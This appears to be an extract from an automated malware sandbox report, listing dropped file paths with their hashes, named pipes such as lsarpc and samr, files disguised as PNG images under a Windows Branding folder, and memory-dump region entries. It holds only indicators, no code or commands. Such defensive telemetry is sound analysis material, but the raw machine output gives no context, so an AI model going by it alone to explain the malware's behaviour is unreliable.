MD5 e5b3ba61c3cf07deda462c9b27eb4166
SHA1 b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256 b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512 a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7404c170-8fc4-4442-b115-3d8f33044de2

MD5 d89968acfbd0cd60b51df04860d99896
SHA1 b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA256 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512 b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_702a450b-524d-476d-a0bb-2f4bf5d8a799

MD5 faa37917b36371249ac9fcf93317bf97
SHA1 a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256 b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_89b8b062-b6b0-4fb3-99a9-046a41c0f506

MD5 a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA1 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256 dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA512 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

memory/1208-143-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d7e64482b71d97c368bdce78ee636c43
SHA1 030e27a5cca10901d60234c02dbdee722d02169d
SHA256 8062237756a25fea76f1212c872143f31c2e8e6a16e8a0b67a2c3af77902dffb
SHA512 3897410e305194044594b21329091248d388eac5c37a1f1434425e6f90aed900307df0c189d37b8ab3a3f5599137c6d572fb98ac19632dd8402c88ee9ab376a6

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1208-156-0x000000001ABA0000-0x000000001ABA2000-memory.dmp

memory/1208-157-0x000000001ABA4000-0x000000001ABA6000-memory.dmp

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1472-160-0x000000001C250000-0x000000001C251000-memory.dmp

memory/1220-161-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/2024-163-0x0000000000000000-mapping.dmp

memory/1716-164-0x0000000000000000-mapping.dmp

memory/924-165-0x0000000000000000-mapping.dmp

memory/788-166-0x0000000000000000-mapping.dmp

memory/932-167-0x0000000000000000-mapping.dmp

memory/1980-168-0x0000000000000000-mapping.dmp

memory/544-169-0x0000000000000000-mapping.dmp

memory/1360-170-0x0000000000000000-mapping.dmp

memory/284-171-0x0000000000000000-mapping.dmp

memory/1276-172-0x0000000000000000-mapping.dmp

memory/1424-173-0x0000000000000000-mapping.dmp

memory/892-174-0x0000000000000000-mapping.dmp

memory/1612-175-0x0000000000000000-mapping.dmp

memory/1192-176-0x0000000000000000-mapping.dmp

memory/1716-177-0x0000000000000000-mapping.dmp

memory/1848-178-0x0000000000000000-mapping.dmp

memory/1752-179-0x0000000000000000-mapping.dmp

memory/1844-180-0x0000000000000000-mapping.dmp

memory/932-181-0x0000000000000000-mapping.dmp

memory/1540-182-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 615f99f0e93e2cc4c6a3a572835fd63d
SHA1 c383f93e9a47adc4d4b265fadfcc3feaf0980a91
SHA256 bc0a2d80569c16b63f59d629c91bfa40f76247e39c2a41dbffb0e41d1eea9ee8
SHA512 dd1196a3067f740be9c8d3cbcfcb7ec511f77daf3ba28929ef8e989597d7a9de5a59e990a7edda5491ef75413967c7db42e6941ec51523428f7fd6a8353f21ba

\Windows\Branding\mediasvc.png

MD5 5b49a655bf1bd6bcb3551bb1cba2a97b
SHA1 a32f1358093e7e3d8ab6abcc286fc2d92a501f78
SHA256 40bbfb4ea867dff557fa9f20ef53d2b31708c847d2c4b601a55f9eabe69c57ca
SHA512 7de6b4bbc1bce7c12a6e7d730f62a6ca33106d9088a0d06e9beba0f94cd8e5a5fcc3d22ebfdcc62467e417dc85f909daf8094b69cd905dfff17fe0981ef7858a

memory/2024-185-0x0000000000000000-mapping.dmp

memory/824-186-0x0000000000000000-mapping.dmp

memory/1984-187-0x0000000000000000-mapping.dmp

memory/892-188-0x0000000000000000-mapping.dmp

memory/1212-189-0x0000000000000000-mapping.dmp

memory/824-190-0x0000000000000000-mapping.dmp

memory/892-191-0x0000000000000000-mapping.dmp

memory/1192-192-0x0000000000000000-mapping.dmp

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1308-195-0x0000000000000000-mapping.dmp

memory/1612-196-0x0000000000000000-mapping.dmp

memory/788-197-0x0000000000000000-mapping.dmp

memory/1984-198-0x0000000000000000-mapping.dmp

memory/1728-199-0x0000000000000000-mapping.dmp

memory/892-200-0x0000000000000000-mapping.dmp

memory/1424-201-0x0000000000000000-mapping.dmp

memory/956-202-0x0000000000000000-mapping.dmp

memory/956-206-0x00000000194B0000-0x00000000194B2000-memory.dmp

memory/956-207-0x00000000194B4000-0x00000000194B6000-memory.dmp

memory/956-238-0x00000000194BA000-0x00000000194D9000-memory.dmp

memory/2272-239-0x0000000000000000-mapping.dmp

memory/2284-240-0x0000000000000000-mapping.dmp